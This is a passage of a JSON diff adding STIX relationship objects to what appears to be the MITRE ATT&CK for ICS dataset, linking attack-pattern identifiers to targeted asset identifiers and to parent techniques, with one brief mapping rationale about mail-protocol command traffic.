"external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:46:45.719Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b0a41a7b-bc37-437c-b1c7-fa20b4525614", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b0ba21e6-4239-4a29-b3bf-d3b37ff8617c", + "created": "2024-06-27T09:13:17.754Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:13:17.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b0ca831e-e4f9-4bb2-aff7-5ad4c7cde6be", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b0e7a770-b39d-40b0-868a-d3c2ef9f0d4f", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b0f28fb5-442f-44f7-b542-33861642e756", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b0f5d834-3e35-4e09-8bc0-1487027b74f9", + "created": "2020-02-03T16:49:58.300Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58", + "target_ref": "attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b1098bbe-7ada-435d-ae9e-514e219de577", + "created": "2024-06-21T14:12:20.265Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.265Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b12d78d7-5b93-4905-9310-95ad67abaff9", + "created": "2020-01-13T17:12:35.481Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--bf147104-abf9-4221-95d1-e81585859441", + "target_ref": "attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b14da572-021f-4ab2-a502-88771208389b", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--dd43c543-bb85-4a6f-aa6e-160d90d06a49", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b165f341-2f3b-4b14-af64-8d15a48a5640", + "created": "2024-06-21T14:12:20.270Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.270Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--41868330-6ee2-4d0f-b743-9f2294c3c9b6", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b1660117-0fb0-48aa-9940-76bb9f70f662", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b1872483-8dbd-4770-a34f-c8b3a451bb33", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b1921480-8499-46a9-8396-2a2d747c5861", + "created": "2023-09-28T19:58:00.892Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:58:00.892Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b1992823-6f90-4412-9814-9569431912d3", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b1ad2de8-905c-4dc4-b6f4-fed72bdfe4fe", + "created": "2024-05-23T04:03:56.660Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T03:03:44.921Z", + "description": "Asset Mapping Rationale: Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.", + "relationship_type": "targets", + "source_ref": "attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b1adaf5a-5c82-4b92-aeea-6400f72014d4", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b1d02312-fda2-445c-a3a2-94af7c06068b", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b1d39b8b-8f2f-405c-a1a4-c1ba3024b9e8", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b1d82808-cb96-4eeb-bfd6-5d52aa46ccb7", + "created": "2024-06-21T14:12:20.275Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.275Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c675646d-e204-4aa8-978d-e3d6d65885c4", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b1ef734c-aa84-4851-bddd-2ee10ee4a504", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--677569f9-a8b0-459e-ab24-7f18091fa7bf", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b20d7b80-82d4-4174-be00-d71b6b3edae6", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b2165b33-6e47-4a76-8a4f-173377b89647", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b21e0340-976d-44b2-94ae-f777199993c6", + "created": "2023-09-28T19:39:00.326Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:39:00.326Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b22e28d4-6461-4f6a-aacb-b2dca055cefa", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4eeaf8a9-c86b-4954-a663-9555fb406466", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b249741b-cfb4-491f-b871-e0f45f46d768", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b24dfefe-de5b-4785-8df3-3001809ab221", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f6ad61ee-65f3-4bd0-a3f5-2f0accb36317", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b270c1e1-a013-420e-a1a8-567fe16ce43a", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b289c971-3fb7-4c3c-b3d6-cf2702b9384a", + "created": "2023-09-28T21:10:50.480Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:10:50.480Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b299cc40-ac6b-4ca0-929b-c21d60799820", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b2be9fa4-db85-409c-a797-7fff8880a195", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b2cbfae6-f43d-4529-8341-7a5a9bff28e5", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b2d97276-503d-4fd0-9517-92e05a774de0", + "created": "2020-03-11T14:49:37.076Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e", + "target_ref": "attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b2e8914a-91bc-42df-8b64-22e5365ede6f", + "created": "2023-09-29T17:42:11.005Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:42:11.005Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b3038000-cf33-4488-8068-bfce27ad3e69", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b3060484-b14f-4212-8582-0e67f264dd88", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0d91b3c0-5e50-47c3-949a-2a796f04d144", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b30cf5d3-d787-4d3d-9341-1d02c6b06471", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b31068ed-df24-477e-9a0f-9cd2358d8782", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b316741b-8bd3-4af6-9d5c-76afca7b9012", + "created": "2020-10-01T01:42:25.082Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": 